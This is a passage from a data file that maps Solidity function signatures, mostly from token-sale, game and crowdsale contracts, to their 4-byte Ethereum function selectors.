"tokenUnfreezeTime()": "0x6b319f36", "slaveWalletInitialized()": "0xb557c9a4", "withdraw_1Completed()": "0xa0a7dc2e", "amountPurchasedWithDecimals()": "0xdc9deea3", "presaledeadline()": "0x38857786", "leadingHitCount()": "0xfd253492", "signedTransferSig()": "0x5b1ea858", "endPreTokensale()": "0xcf6304d4", "founders_1()": "0x0e39b210", "tokensIssuedOwner()": "0x45395b03", "prevContract()": "0xe449de9f", "bankMultisig()": "0x6de84a4f", "tokenAdvisorPartners()": "0x24500e05", "DataBase()": "0x8caa5c91", "AutoSell()": "0xc3722b1f", "requiredSignedAddress()": "0xd222dc04", "minimumPowerUpSizeBabz()": "0x9ccbbc6a", "fused()": "0x2529d1a3", "endIcoSaleRound3()": "0x8ffbcb81", "MAX()": "0xd49d5181", "RudysToken()": "0x228c790c", "IXTPayment()": "0xdf6cf923", "PROCESSBY()": "0x0029514f", "teamPoolForFrozenTokens()": "0xabbc8afa", "devTokensIco1()": "0x1b476945", "startsAt()": "0xaf468682", "ADDR_TKG_ORG()": "0xe71b49ad", "deathFactor_ii()": "0xacc3e5d9", "numMarriages()": "0xddd113f4", "icoMaxCap()": "0xb7134feb", "buyOmegaEgg()": "0x1b385f34", "batchCreateDrawings()": "0xdc52c514", "defaultFoundersRewardTime()": "0xa19db682", "calculateTotalExpenseWithdrawableAmount()": "0x4a914e8c", "getopenDdaListAssets()": "0x56416147", "DOMAIN_SEPERATOR()": "0x0df63210", "ICO_RATE1()": "0x72a56d2c", "gameIsOver()": "0x1d012c8e", "deathData_v8()": "0x59a78c1a", "founderWithdrawablePhase3()": "0x4b1dc225", "accountRegistry()": "0xd089e11a", "earnedEthWei()": "0x786ef70a", "publicbattlestart()": "0xc7410070", "groomVow()": "0x269695fe", "currentCandyTotalSupply()": "0xdec10357", "pgoMonthlyPresaleVault()": "0xfca7cdba", "Good_Bye_World()": "0x100349fa", "product3()": "0x48ad5cd0", "isRentals()": "0x7e990ad8", "blocksInADay()": "0xa0472d6c", "percentFeeTimes5()": "0x3de696d3", "vestingOwing()": "0xbf35af36", "mintCapInUSD()": "0xb45a2712", "bullAmount()": "0x523ad959", "lastBonusNumber()": "0xbc5cfd4f", "gracePeriodStartBlock()": "0x41461bad", "financialAccount()": "0x4f755fe7", "refferalFee()": "0xd2b5d9e1", "failSafeMode()": "0xed361694", "totalInvSupply()": "0xc8bd14ef", "tiersInitialized()": "0xdcf8045e", "changeInsuranceFeesOperation()": "0xcccc020f", "investorsAddress()": "0xb7629dcb", "product1_luckybuyTracker()": "0x75e2f405", "getTraitCount()": "0xbba4e9bd", "magicStore()": "0x8ba93fcb", "sendfrozen()": "0x1c481767", "contractStartTime()": "0x0c3d5157", "sixthTeamWithdrawal()": "0xa5a9cf0d", "silverPercentage()": "0x8911cd9a", "payoutETH()": "0x659382fb", "CTU_ADDRESS()": "0x0c55f818", "REDEEM_METHOD()": "0x7d79265b", "gameName()": "0x473bc223", "genericSender()": "0x17216484", "gameRandon2()": "0x6187ce34", "total_freeze_term()": "0x871c7aab", "lastRegionId()": "0xb6bd387a", "totalSetCredit()": "0x51e82eec", "current_round()": "0x319c068c", "candidateTillXPAAssets()": "0x6d78e48a", "burnEnabled()": "0x5dc96d16", "developmentTokensWallet()": "0x662a6137", "IsTransferTempFromOldContractDone()": "0x4513a7f4", "START_PRICE()": "0x3609ac8f", "price_start()": "0x29b4d111", "setETHUSDRate(uint256)": "0x67821686", "PIXToken(address)": "0x8e6a1b24", "IntermediateWallet()": "0x9d2777f4", "ETFToken(address[],uint256[],uint256)": "0xf35d606c", "SigProof()": "0x7df47407", "BubbleToneToken(address)": "0x6ad60e3d", "userMigration(uint256)": "0x221ef94d", "settingsSwitchState()": "0x2c6e879f", "setUmkaAddress(string)": "0x3042b17d", "getUmkaAddress(address)": "0xb194073a", "getHolderLink(address)": "0xe7921023", "getHoldersLength()": "0xdb04aef4", "getBalanceOfDist(bytes32)": "0xf256b48e", "getGroup(address)": "0x53adce21", "serviceTrasferFromDist(bytes32,address,uint256)": "0x2aef6ff6", "serviceTrasferToDist(bytes32,uint256)": "0x420aa07d", "serviceTokensBurn(address,address)": "0xab28e8af", "serviceRedirect(address,address,uint256)": "0x68d88c25", "serviceDecreaseBalance(address,uint256)": "0x048cf8ed", "serviceIncreaseBalance(address,uint256)": "0xa0d1f9e9", "serviceClaimOwnership()": "0x561a0d65", "serviceTransferOwnership(address)": "0x7bc363f9", "serviceGroupChange(address,address,uint8)": "0xb1bb1a60", "serviceUnpause()": "0x648619dc", "servicePause()": "0xfeadce9c", "TokenERC20(uint256,string,uint8,string)": "0x2fe69430", "FremenTradeToken()": "0x9da1814c", "setStr(string,uint256)": "0xb05d8096", "SoftDude()": "0x742bff62", "THB_Omnidollar()": "0x3d7c9f8c", "dropNectar(address[],uint256[])": "0x75e9c91f", "isModOrCreator()": "0x9a99f7e0", "isMod()": "0xbf3bcc41", "setPendingReview()": "0xcd7fa74b", "approveAlgo()": "0x4962ad08", "setInactive()": "0xf1b9ee24", "forceUpdateWinners(address[])": "0xf803bef0", "updateWinners(address[])": "0x5c2ee908", "stopBounty()": "0x3edaf264", "startBounty()": "0xfadcf13c", "stopEnrollment()": "0x240dfd6e", "startEnrollment()": "0xc8b26773", "forceUpdatePrizes(uint256[])": "0x4a81dc0f", "updatePrizes(uint256[])": "0x8044c67e", "forceUpdateName(string)": "0x158ef412", "updateBounty(string,uint256[])": "0xa22fb98b", "join(address)": "0x28ffe6c8", "isFunded()": "0x7c654303", "joinBounty(address)": "0x9ee0933f", "createBounty(string,uint256[])": "0xd992aa70", "getBountiesByParticipant(address)": "0x5502be83", "getBountiesByCreator(address)": "0x02ef3844", "forceBuy(address,address)": "0x78b29105", "setBountyFactory(address)": "0x16a2a0cc", "getAlgosByCreator(address)": "0x57aaf08b", "getAllAlgos()": "0x49135b0f", "addAlgo(uint256)": "0xf778f32b", "removeModerator(address)": "0x869d785f", "NOTNCoin()": "0x3e5fbedd", "EgretiaToken()": "0x8c26ebf7", "_mintTimelocked(address,uint256,uint256)": "0x67814109", "ISCoin(address)": "0xe82906b3", "_getTokenLockType(uint256)": "0x8df87c66", "canRelease()": "0x3705f69e", "Liberty()": "0x549bf4bf", "CrosspaysToken()": "0xa5c1db32", "_today()": "0x4a8967a6", "tokensVested()": "0x77467197", "tokensUnvested()": "0x049cac16", "getTokensFromEth(uint256)": "0xc0f6c0da", "getTokensMintedAt(uint256)": "0xc0a35e8b", "capitalFundable()": "0x3acacfbe", "_errorBuyingTokens(string)": "0xb013b369", "fundCapital()": "0xb2d6bc83", "initSale(uint256,uint256,uint256,uint256,uint256,uint256)": "0xa99a3f98", "logPrice(address,address,uint256)": "0xcf9ac727", "disconnectOrderUser(address,address,uint256,address)": "0x683674dc", "disconnectOrderPrice(address,address,uint256)": "0xb635a52d", "makeTrade(address,address,uint256,uint256,uint256)": "0xb0e12715", "BonusAwareCalculator(address,address)": "0xc2c5f89f", "DWMP()": "0x1c7564cb", "getHorseShoe(uint256)": "0x2ce5fb75", "_generateNewHorseShoe(uint256,uint256,address)": "0x7ea531e7", "createHorseShoe10(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,address)": "0x9a1fdc10", "createHorseShoe1(uint256,uint256,address)": "0x2b00c6fd", "createHorseShoe4(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,address)": "0x379c1bd9", "meltHorseShoe(uint256,address)": "0x9c121b6d", "horseShoePr(uint256)": "0x7290f691", "horseShoeFS(uint256)": "0x514d6e07", "horseShoeNotForSale(uint256)": "0x9fe005e8", "horseShoeForSale(uint256,uint256)": "0x5560d365", "ironProcessed(address)": "0x3d3984bf", "_newHorseShoe(uint256,uint256,uint256,bool,bool,address)": "0x0d4a464f", "setHSShopSaleFee(uint256)": "0x6417dec3", "firstSellHSShop(uint256,uint256,uint256)": "0x6c18cc1e", "buyHSShop(uint256)": "0xf4451628", "changeHSShopPrice(uint256,uint256)": "0xf8ebf282", "newForgeCon(address)": "0xc60aa10d", "VuePayToken()": "0xfcf516aa", "disqualifyBid(address)": "0x09541d48", "getDiceWinAmount(uint256,uint256,uint256)": "0x33d2cea2", "getRollUnder(uint256,uint256)": "0x84b60937", "refundBet(address)": "0x2c69e64e", "settleBet(address)": "0x6d5f3e15", "increaseJackpot(uint256)": "0xd6d30a51", "changeMaxBetDoubleDice(uint256)": "0xcf62d4e3", "changeMaxBetCoinDice(uint256)": "0x09fb1668", "acceptNextOwner()": "0xd06c54fb", "approveNextOwner(address)": "0xd579fd44", "MichiganvsLoyola()": "0x2632fc3c", "SAtomX()": "0xb6d7dbb2", "DAppSky()": "0x2ef345e4", "hexStrToBytes(string)": "0x08e8ac38", "setFundraiserCallData(string)": "0x13b7423a", "BTCUToken(uint256,string,uint8,string)": "0xff299a63", "MSCCStandardToken(uint256,string,uint8,string)": "0xd7c81fdc", "MadoffCoin()": "0x5a7b57f2", "YumeriumToken()": "0xadf5d1cb", "UTWD()": "0x99c6da4a", "BbeCoin()": "0xc370b0b5", "DEAToken()": "0x34776c6e", "ZENOSEarlyPurchase()": "0x2cd05122", "crowdsaleStartingBlock()": "0x5bfdb8b2", "Sense()": "0xdc835df5", "HieToken()": "0x163740d1", "privlocatumICO()": "0x5ba88490", "privlocatum(string,string,uint8,uint256)": "0xefb109d4", "getBetKey(uint256)": "0x2eb3a797", "getOraFee()": "0x52595c0d", "changeORACLIZE_GAS_LIMIT(uint256)": "0xa3d823ad", "getInvestStatus(uint256)": "0x617b293e", "changeDivestFee(uint256)": "0x4d4ba1d7", "changeInvestNum(uint256)": "0xb77ffaf5", "addInvest()": "0x2e471d47", "getPlayerBetResult(uint256)": "0xdc845934", "watchPercent()": "0xea43671d", "changePercent(uint256)": "0x812d6c40", "getBetNum()": "0xe416faa0", "setStarted()": "0x1c249494", "setStopped()": "0x71135f8b", "BananaGame()": "0x1f790a94", "NetWexCoin()": "0x75dd3799", "situation_challenge()": "0x039e4e2a", "reading_card_upright_at(uint8)": "0x7f006ce1", "VOLOP(uint256,string,string)": "0x12a0b3ba", "MBToken()": "0x8f98e0e1", "UmkaToken(string,string,uint8,uint256)": "0xfad15673", "addExplorationByShip(uint256,uint256,uint256)": "0x017bef67", "cancelExplorationByIndex(uint256)": "0x9d64d474", "cancelExplorationByShip(uint256)": "0xb4015034", "getIndexByShip(uint256)": "0xdc5b0662", "VietnamToken(uint256,string,uint8,string)": "0xf6eb13b3", "Zenix()": "0x9bdf5a7c", "setlvlNfee(uint256)": "0xbe7a1540", "setlvlWebsite(string)": "0x1ec762a4", "setlvlUpdate(string)": "0x7c5e6949", "setlvlNominalValue(string)": "0x3a878528", "setlvlSign(string)": "0x6b7a247e", "freezelvlAccount(address,bool)": "0x22a8fb18", "burnlvlToken(address,uint256)": "0x170c28a2", "mintlvlToken(address,uint256)": "0xb5a312c6", "plutocracylvlAchieved(string,string)": "0x91d1addb", "rebatelvlEconomy(string,string,string,string,string)": "0x1bde9bc1", "taxlvlEconomy(string,string,string,string,string)": "0x00b79dd9", "notifylvlClients(string,string)": "0xb6ade100", "notifyAuthority(string,string)": "0x518adacd", "settlvlement(address,uint256,address,string,string)": "0xdeaca58e", "repayLoan(address,uint256,string)": "0x59758ebe", "lend(address,uint256,uint256)": "0x7082d203", "Krown(uint256,string,uint8,string,address)": "0x54cc61bc", "transfekbolPlutocrat(address)": "0x2670cc14", "transfekbolOwnership(address)": "0xa340ceac", "KEOS()": "0xe364bd01", "setDistributor(address,bool)": "0xd59ba0df", "InvestorToken()": "0xe4a682d8", "PropertyCoin()": "0x7098ad13", "WINT()": "0x24edc2a1", "unlockPrivate()": "0xdfca685a", "IronHandsCoin()": "0x5375f182", "AFWBurn(uint256)": "0x2c4879d1", "getBalanceIco()": "0x234f9db2", "GetSale()": "0x003a3d80", "EthToAFW(uint256)": "0xa2730c23", "currentStepIndex()": "0x334f45ec", "AFWToken()": "0xea9a3eb5", "Artcoin(address,uint256,uint256)": "0x4aea5f0f", "orderWasValid(uint256,uint256,uint256,uint256)": "0xbb370bad", "setHandler(address,bool)": "0x9cb7de4b", "DeBiToken()": "0x78ad76e6", "RedPen()": "0xfb241406", "PooCoin()": "0x64c8e825", "Bitconnect()": "0xf704b57a", "sumofsquares(uint256,uint256)": "0x5cc422a1", "initCountry(uint256,uint256)": "0xc5bfef39", "CrytoWorldCup()": "0xa49a42e1", "getAllNumberOfBets()": "0x013f84fa", "getAllTotalPrize()": "0xd630efbc", "getAllGameStatistic()": "0xca887dc4", "getNumberOfBets(uint256)": "0x98fcc93e", "getGroupIndex(uint256)": "0x48cf9e5c", "sessionEndTime()": "0xbb575333", "airDropPayableTag()": "0x94868f7d", "bigTokensPerEther()": "0xb55b089b", "ChallengeFund()": "0xf3b4eccb", "limitVIP()": "0x416ccd02", "TOTAL_LOCKS()": "0xfd2edd76", "totalSaleCapUnits()": "0x37d48628", "isBacker()": "0x237032da", "saleClosedTimestamp()": "0x48a50a54", "publicEventTokens()": "0xda96bbcd", "forGenesis()": "0x2a27fd4a", "xtime()": "0x844323fa", "Limit_Amount()": "0x713fd253", "decider()": "0xfc6def15", "publicTGEStartBlockTimeStamp()": "0x13df35d1", "STTadmin2()": "0x51ec8433", "totalTokenCollected()": "0xf127328a", "SerpenSegmentCount()": "0x2185072f", "stageIndex()": "0xdc97e366", "unicornsGifted()": "0x1f7cdd9b", "amountFundPlatform()": "0x36540b3b", "blockstillcontracthackable()": "0x7056b50f", "me()": "0xcb12b48f", "TOTAL_MAX_CAP()": "0x870dbae0", "RANGEEND_5()": "0x32ba4b8b", "blockStart()": "0x7b2feaaa", "currentBid()": "0xdef18101", "ratingContractAddress()": "0xdcb5930a", "preSaleConversionRate()": "0x6b668601", "getDSTSymbolBytes()": "0x20e87093", "RATE_SALESTAGE4()": "0xdb77032d", "btcRateMax()": "0x5b38863a", "getTotalInfo()": "0x285109d1", "futureDevelopmentFundAddress()": "0xa332853a", "requestCore()": "0x6c4fbaa4", "getPlayerCardsNumber()": "0xd572fd99", "RELEASE_WALLET()": "0x8efa23d1", "bonus02End()": "0x0162827c", "PRE_ICO_MIN_CAP()": "0x042abdf8", "angelRound()": "0x3df6b23c", "bmcPlatform()": "0x2d596330", "reTweetRewardPool()": "0x3e8be2e1", "toogleActive()": "0x0d8c1a62", "sendPresaleTokens()": "0x400a4deb", "reserved()": "0xfe60d12c", "ownersWallet()": "0x478f796a", "trustAddress()": "0x6d60e6b4", "devReward()": "0x26eaee92", "TokenSellPercentage()": "0x60425c48", "secondPreSaleDate()": "0x1987da04", "icoTokenSales()": "0x29f5fb9c", "hardCapHigh()": "0x92b6641a", "automaticThreshold()": "0x848e3442", "HighGasAmount()": "0x7e0e20ba", "dtStart()": "0xf0123bc2", "firstAuctionsInitialDuration()": "0xf7f1962e", "milliTokensPaid()": "0x8099f357", "redemptionPrice()": "0xc5b748c0", "preSaleTokenPrice()": "0x7259bce3", "marriageLicenceImageIPFShash()": "0x277942db", "AIRDROP_AMOUNT()": "0x2b5b6872", "AgriChainPrevData()": "0xf4250f75", "mainICOThirdWeekEndTime()": "0xd77c96f8", "myLoseShare()": "0xe3843f6e", "referralLinkMinimum()": "0xfdd245ee", "FEE_SILO()": "0xbf61b517", "saleInited()": "0x49fcfce7", "m_funds()": "0x6cf35782", "tokenSupplyLimit()": "0x20f10fdd", "preSaleTokensLeftForSale()": "0x8800052e", "VOTING_PERIOD_DURATION()": "0x82a3f98d", "BEGIN_TIME()": "0xc75363b6", "GTO()": "0xa840d2a8", "crowdsaleEndLockTime()": "0xdeb83bcc", "unspentCreditsWithdrawn()": "0x2355300f", "PRICE_DIVIDER()": "0x5bcbc0f9", "RANGESTART_5()": "0xefe7c791", "knownReserved()": "0x5e0fec6a", "bountyTokenAddress()": "0xa587c9f7", "CO_FOUNDER_PORTION()": "0xeedb714c", "etherDeltaInfo()": "0x1bff4786", "toSpread()": "0xec36196e", "ethOfKey()": "0xb510e42c", "initialiGnSupply()": "0xf371475a", "saleIsActive()": "0xeb8d2444", "withdrawDeferred()": "0x3cdf6783", "percentageRecipient1()": "0x28310f10", "SPECTRE_BOUNTY_ADVISORY_DEV_TEAM_ALLOC()": "0xb2bf731d", "MIN_ETH_FUND()": "0x71140942", "getCrowdsaleBalance()": "0x1b082009", "finalisePreSale()": "0xf9a94d43", "appHub()": "0x234a0ee7", "isEmoji()": "0xaa8f027b", "pre_ico()": "0x6cb90a2c", "totalInput()": "0x9e15bc25", "allowPublicWithdraw()": "0x5ce7514e", "finalstate()": "0xbd9a11fd", "maxCapPreSale()": "0x50db7247", "teamUnlockedAfterCliff()": "0x0086bb3e", "tokensAllocatedToCrowdFund()": "0x72eda05f", "nextActionIsAuthorised()": "0x05e4545d", "warriorGold()": "0xdde7af32", "STARTING_CLAIM_PRICE_WEI()": "0x7720295a", "votes_for()": "0x4093b49c", "overshoot()": "0x9374c487", "zilleriumToken()": "0xe93e25fe", "lastLockingTime()": "0x5ed31991", "bonusLimit5()": "0x1610c734", "Start6()": "0xed0f22d5", "presaleStartedAt()": "0x07fee2a6", "ownershipToCreator()": "0x5006e60a", "allowed_contract()": "0xa0193ff9", "BASE()": "0xec342ad0", "saleFinalize()": "0x70212761", "PHASE3_SUPPLY()": "0x2fe6ecb2", "maxDexSize()": "0x1649b76d", "addressNotUpgradable()": "0x39e31ceb", "nStages()": "0x07d1ccd2", "ebyteToken()": "0xa720e0a8", "TicketsInGame()": "0xe6657008", "resumeLotto()": "0x7ca1a66c", "ecoSupply()": "0xc4694ec6", "totalMarketplaces()": "0x6c29d714", "TOKENS_ACCELERATOR()": "0x22bcabcd", "minerLockedAmount()": "0xbc4d9b50", "pubEnd()": "0x2926050f", "head()": "0x8f7dcfa3", "totalmoneyearned()": "0x35423643", "managerETHaddress()": "0x4c54cc1d", "issuedFromOtherCurrencies()": "0x37900d5a", "maxSale()": "0x3e30046a", "indCommunity()": "0x06b1b479", "priceConfirmedOver500()": "0xae44e840", "lockStart()": "0x881ed6db", "fundsDistributor()": "0x74cb55fb", "Total_Deposits()": "0xb034d5aa", "getServiceFeeNumerator()": "0x1596b2bf", "withdrawedTokens()": "0x6ab5bcd0", "initIntervals()": "0x279b9562", "icoTimeBonusPhase2End()": "0xc831306e", "gasReserve()": "0xeea7570e", "minimumCommission()": "0x6514aaca", "bonusInPhase3()": "0x94c69715", "emissionTime()": "0xfc860e96", "forbidDirectDebit()": "0x1b2212f5", "spentParsecs()": "0xc273b05f", "directorName()": "0x892e243a", "ttlPlayers()": "0x5d3e64bf", "PriceIncrease()": "0xc2f666a3", "distributed_bounty()": "0xcb1aaa31", "adPriceWeek()": "0xcbe211ec", "foundersFundAddress()": "0xca185022", "releaseValue3()": "0x1215f8ef", "SPAMed()": "0x3232f204", "lottoIdentifier()": "0xc945b53f", "maximumIcoRate()": "0x71674ee5", "VESTING_DIV_RATE()": "0xb37a336d", "getDonationPrice()": "0x4f9ebe09", "getRomms()": "0x038fa9cb", "icoStartsAt()": "0x13e5d8b6", "withdrawEtherToOwner()": "0x61f76d67", "voteStopped()": "0x98fb2eca", "bnbRefundEnabled()": "0xf1762e5d", "claimTax()": "0x448883d7", "TOKEN_TO_CREATOR()": "0x11ce4556", "shpExchangeRate()": "0x788e0760", "buyEPU()": "0x1ab51aec", "UTTotalSupply()": "0xc9b2a580", "OppToken()": "0x28368e0f", "alreadyMintedOnce()": "0x73de975c", "TOKEN_SUPPLY_AIRDROP_LIMIT()": "0x655b3667", "packLimit()": "0xeb1098b8", "currentIcoRate()": "0xf5aab219", "tenant()": "0xadf07791", "gasAmount()": "0x67b50af9", "lastTransactionRec()": "0x6c194b59", "elc()": "0x3b80fc5f", "Netkrone()": "0xef043c5a", "account3Address()": "0x85f517d4", "IsInitAssign()": "0xedcb3c08", "completeLottery()": "0xddbf5856", "LastValidated()": "0xae4fbdeb", "bids_computed_cursor()": "0x8c44dfb5", "Coin_Character()": "0x31f607a5", "DEVELOPMENT_TEAM_CAP()": "0x2618a571", "addTotalEtherValue()": "0xf3acc477", "PriceWeekOne()": "0x3c4dbb17", "getChecksumAlgorithmCount()": "0x466c3a2b", "host_percentage()": "0xaa9a2cf0", "distributionFinished()": "0xc108d542", "saleShare()": "0x3097324c", "deathData_a10()": "0x6ff46ba7", "PRESALE_ETH_IN_WEI_ACCEPTED_MIN()": "0xeee6ce93", "searchStartIndex()": "0x20ec75c2", "marketEggs()": "0x2e9392bb", "minimumBuyIn()": "0xbc070e83", "forceFinished()": "0x55a01845", "secondsTimeLockedDefault()": "0xb374db9a", "FAPFundDeposit1()": "0xc8e56acb", "adminUsrCount()": "0xf9d5e08b", "_computeAndSetBaseParameters16_18_22(uint256)": "0x537fcd6b", "_getBonus(uint256)": "0xc861f243", "_computeUniqueness(uint256,uint256)": "0x070bc415", "_computeRarity(uint256,uint256,uint256,uint256,uint256,uint256)": "0x73a40efb", "_computeAura(uint256,uint256)": "0x2a2dd486", "_computeRarityBonus(uint256,uint256)": "0xa0844bb5", "_getBattleBonus(uint256,uint256,uint256,uint256,uint256)": "0x927e69e2", "_getPetAura(uint256)": "0xf4ab4d1d", "_getPetBonus2(uint256)": "0xc1790561", "_getPetBonus1(uint256)": "0xcbdb2469", "_unpackPetData(uint256)": "0xac51a36a", "_computeBackground(uint256)": "0xd15db5fb", "_computeBorder(uint256)": "0x73b2c384", "_computePet(uint256,uint256,uint256)": "0xbd28f504", "_computeWings(uint256,uint256,uint256)": "0xb0df5f81", "_computeRunes(uint256)": "0xa8474a30", "_setAuraValue23(uint256)": "0x6ba4f143", "_setDamgeValue22(uint256)": "0x11c0b024", "_setSpecialityValue21(uint256)": "0xc129827b", "_setRarityBonusValue20(uint256)": "0xa7bb1cf4", "_setClassMechValue19(uint256)": "0x97bfd8cb", "_setStrengthValue18(uint256)": "0xe7c158c6", "_setAgilityValue17(uint256)": "0xa6808c3c", "_setIntelligenceValue16(uint256)": "0xfcd51a4e", "_setBackgroundValue15(uint256)": "0x599362d0", "_setBorderValue14(uint256)": "0xe2a27ca8", "_setPetValue13(uint256)": "0x537ca660", "_setWingsValue12(uint256)": "0xd7d1b48c", "_setRunesValue11(uint256)": "0x23cc3496", "_setHatValue10(uint256)": "0x5a5b32b7", "_setWeaponValue9(uint256)": "0xdffa771f", "_setArmorValue8(uint256)": "0x770d6591", "_setHairColorValue7(uint256)": "0x86f2e5cf", "_setHairValue6(uint256)": "0x27815883", "_setMouthValue5(uint256)": "0xf389057f", "_setEyesValue4(uint256)": "0xd8c65cbb", "_setBodyColorValue3(uint256)": "0x6bde2e7f", "_setClassViewValue2(uint256)": "0xe48cf65f", "_setRarityValue1(uint256)": "0x6127a1ad", "_setUniqueValue0(uint256)": "0xa3dfcb0d", "getAuraValue(uint256)": "0x4efc067f", "getDamageValue(uint256)": "0x1f5a2a52", "getSpecialityValue(uint256)": "0x1c973c57", "getRarityBonusValue(uint256)": "0xcf0fdacb", "getClassMechValue(uint256)": "0x825edfd3", "getStrengthValue(uint256)": "0x99ed7b87", "getAgilityValue(uint256)": "0x37b89705", "getIntelligenceValue(uint256)": "0x4f4522b0", "getBackgroundValue(uint256)": "0xc135a2d8", "getBorderValue(uint256)": "0xf8bfb34c", "getPetValue(uint256)": "0xe223ed87", "getWingsValue(uint256)": "0x41be84cf", "getRunesValue(uint256)": "0x6fde3dc0", "getHatValue(uint256)": "0x1a0726df", "getWeaponValue(uint256)": "0x38f98d09", "getArmorValue(uint256)": "0xef89d6e3", "getHairColorValue(uint256)": "0x053ae2ca", "getHairValue(uint256)": "0xcc63996e", "getMouthValue(uint256)": "0x8ae5e372", "getEyesValue(uint256)": "0xd8464746", "getBodyColorValue(uint256)": "0x14280bb8", "getClassViewValue(uint256)": "0x262af3dd", "getRarityValue(uint256)": "0x7c25d997", "getUniqueValue(uint256)": "0x43386ea9", "unpauseTournament()": "0xd08279b0", "pauseTournament()": "0xd8a489d9", "unpausePVP()": "0x20154e78", "pausePVP()": "0x89cda6a8", "tournamentFinished(uint256[])": "0x11196cc2", "pvpContenderRemoved(uint256)": "0xd7d3c4d5", "pvpFinished(uint256[],uint256)": "0xdfba3be1", "isPVPListener()": "0xe4d9d212", "getPVPEntranceFee(uint256)": "0x63749225", "addPVPContender(address,uint256)": "0xa99306e7", "getTournamentThresholdFee()": "0x24abfc02", "addTournamentContender(address,uint256[])": "0xf8b608a1", "isPVPProvider()": "0xf773ab80", "generateWarrior(uint256,uint256,uint256,uint256)": "0x9729ec26", "isSanctuary()": "0x9711f20d", "isMintDone()": "0x2f194e40", "transferArray(address[],uint256[])": "0x942d468b", "MilcToken()": "0x74fa01c9", "deleteFromBlacklist(address)": "0x8de6b343", "blacklisting(address)": "0x8a294c60", "OreOreCoin(uint256,string,string,uint8)": "0x28459871", "getCashbackRate(address)": "0x390c5874", "updateHistory(address,uint256)": "0x777aff7d", "editStatus(uint256,string,uint256,uint256,int8)": "0xdca9fd5b", "pushStatus(string,uint256,uint256,int8)": "0xf7ac5611", "setCoin(address)": "0x82e46b75", "HSB()": "0x30b8f85d", "LordCoin()": "0x35f79b83", "changeAcceptExchange(bool)": "0xc4864f45", "ProfitExchange()": "0xc17b5a93", "NETR()": "0x81961946", "setFrozen(address,bool)": "0xac869cd8", "setSupplyLock(bool)": "0xfa51a2bf", "setAllowedAddress(address)": "0x1b8fc2f0", "GA_chain()": "0x55cd1915", "backTixOwner()": "0x7492384a", "tournamentStartTime()": "0x58a5b0f6", "setICO3Phase()": "0xc2236b26", "ratePerWeiInMainICO()": "0xcaf306c2", "balanceForReward()": "0x10c0afaa", "isPreSaleClosed()": "0x7d019f87", "SOFT_CAP_EUR()": "0x673756d8", "oracleType()": "0x0d623e10", "Divies()": "0xd7f9d655", "cslToken()": "0x42bf1270", "presaleProcessed()": "0x9883521e", "ETHWallet()": "0x1a30ec13", "getEtherum()": "0x5deff965", "endPreICOStage1()": "0xe60b0cad", "preSaleEndTime()": "0xcce29ea7", "calLoanAmount()": "0x15d5219f", "AgriChainProduction()": "0xdc720528", "iCoTokensSold()": "0x68fb81b7", "PROMETHEUS_SHIP_LIMIT()": "0xa260c045", "XAP()": "0xcd0c870d", "IMPACT_REGISTRY_ADDRESS()": "0xd81ad101", "out2Done()": "0x7b6a3e27", "amount_investments()": "0x6c48a097", "factoryAddress()": "0x966dae0e", "minimumTokenAmount()": "0xdec7fa11", "MINING_POOL_HOLDER()": "0xc870ef78", "maxTimeout()": "0x68b85aa5", "COIN_SUPPLY_ICO_PHASE_2()": "0x712a10bf", "publicPresale()": "0x3f2eed3b", "sellFeeMilliPercent()": "0xe8fb02d2", "like()": "0xa523b88a", "burnedToken()": "0x330c4ce0", "coldWallet1()": "0xdc8ee41e", "coinSaleStarted()": "0x97187ac8", "payAffiliate()": "0x91cef6a8", "confirm_token_deposit()": "0x2bd55918", "requiredMajorityPercent()": "0xfcd41502", "totalCollectableToken()": "0x3c324c2e", "percentageRecipient3()": "0xedfd2f81", "supplyLocked()": "0x943eb504", "fourth()": "0x8c09138f", "contractTotalInvested()": "0xd30920c1", "distributionRealized()": "0xd3f3bea2", "migrated()": "0x2c678c64", "getAccountsNumber()": "0xa3179fe0", "TIMEOUT_TIME()": "0x1c1bd814", "isInPreSaleState()": "0x2301e7b7", "hogsmashToken()": "0x6a30eb24", "PROBABILITY_DIVISOR()": "0xf1c21077", "TOKENS_FUTURE()": "0xf92c9b47", "SSOTHEALTH_FUNDS_ADDRESS()": "0x68b47d87", "tokensAirdrop()": "0xf5ab865a", "R_N_D_WALLET()": "0x50ff0761", "vesting1Withdrawn()": "0x75ad31a0", "StocksAddress()": "0x6ac4f8e4", "pool_percentage()": "0xe530db1c", "totalGamesPlayed()": "0x5c492129", "ratePerWeiInSelfDrop()": "0xa1e03f57", "GrowthPool_Released()": "0xbf1cd416", "ResumeEmergencyStop()": "0x53c3cc1f", "ADDR_TKG_VC()": "0x03c401e3", "devTimeLock()": "0x7b807a51", "contributionRejected()": "0x538dfcac", "weisSoftCap()": "0x68d06724", "whitelistRegistry()": "0xed950638", "PRICE_STAGE_THREE_BONUS()": "0xdee5a9e7", "hasThreeYearWithdraw()": "0x811f273d", "numOfFinishedPromotions()": "0x08171d30", "hunterLicenceEarning()": "0x936241b7", "minInvestmentLimit()": "0x6afa0381", "maxBetThresholdPct()": "0xd1d5824d", "devs()": "0x9a96f829", "RESTRICTED_PERIOD_DURATION()": "0x80cdc9c9", "_holding()": "0x4ff44fda", "MAX_CONTRIBUTION_WEIS()": "0x9f132677", "mulFactor()": "0x3ff7f21c", "targer()": "0xa4eaec5f", "tokensPerWeiBonus111()": "0xd1bb7b59", "ActualQueue()": "0xf93ca568", "toWei()": "0x573dea96", "nextFrontWindowAdjustmentRatio()": "0x16c72861", "turnOffCanUpdateNextGamePotSplit()": "0x8088e0b6", "pendingOwnedOwner()": "0x4902d163", "getCars()": "0x17c39286", "MAX_REFERRAL_TOKENS()": "0xd4ac6af5", "mntpToken()": "0xc6e000b5", "CultureTravelFoundationAddr()": "0xb1598725", "setWeiLockSeconds()": "0xd12a6049", "create21PizzasTokens()": "0x29c8dae7", "getAmountTransferred()": "0x72c5cb63", "tokensForCrowdSale()": "0xbd4074f9", "currentMessageNumber()": "0xd91f68a2", "thisTokenBalance()": "0xde37e977", "minimumContributionPhase6()": "0x231a2be3", "UTC2MYT()": "0x4826e9c5", "cutOffBidID()": "0x1ae9fe6a", "referrerEnable()": "0xa3aba50e", "PIN_PRICE()": "0x7a10f17b", "client_wallet()": "0xe7099763", "summSupporters()": "0xcf5b8018", "MAX_TRANSFER()": "0x9d53827f", "reward(address,bytes32)": "0xfb4101c0", "createChannel(bytes32,address,uint256)": "0xaa03dfaa", 